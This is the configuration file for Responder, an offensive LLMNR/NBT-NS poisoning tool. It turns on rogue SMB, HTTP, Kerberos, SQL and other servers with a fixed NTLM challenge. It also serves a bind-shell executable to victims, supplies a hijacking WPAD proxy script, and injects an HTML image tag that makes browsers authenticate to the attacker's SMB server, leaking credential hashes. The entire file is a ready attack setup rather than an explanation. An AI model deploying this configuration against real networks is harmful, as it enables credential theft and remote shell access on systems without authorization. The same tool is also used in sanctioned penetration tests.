Responder/Responder.conf

[Responder Core]

; Servers to start
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On

; Custom challenge
Challenge = 1122334455667788

; Default log file
SessionLog = logs/Responder-Session.log

; Poisoiners log
PoisonersLog = logs/Poisoners-Session.log

; Analyze mode log
AnalyzeLog = logs/Analyzer-Session.log

; Specific IP Addresses to respond to (default = All)
; Example: RespondTo = 10.20.1.100-150, 10.20.3.10
RespondTo =

; Specific NBT-NS/LLMNR names to respond to (default = All)
; Example: RespondTo = WPAD, DEV, PROD, SQLINT
RespondToName = 

; Specific IP Addresses not to respond to (default = None)
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo = 192.168.183.1, 10.0.2.2, 127.0.0.0-254

; Specific NBT-NS/LLMNR names not to respond to (default = None)
; Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =


[HTTP Server]

; Set to On to always serve the custom .exe regardless of the URL
Serve-Always = Off

; Set to On to serve the custom .exe when the URL contains .exe
Serve-Exe = On

; Set to on to serve the custom HTML if the URL does not contain .exe
Serve-Html = On

; Custom HTML to serve
HtmlFilename = files/AccedsDenied.html

; Custom EXE File to serve
ExeFilename = files/BindShell.exe

; Custom WPAD Script
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}

; HTML answer to inject in HTTP responses (before </body> tag).
; In this example, we redirect make users' browsers issue a request to our rogue SMB server.
HTMLToServe = <img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='1'>


[HTTPS Server]

; Configure SSL Certificates to use
SSLCert = certs/responder.crt
SSLKey = certs/responder.key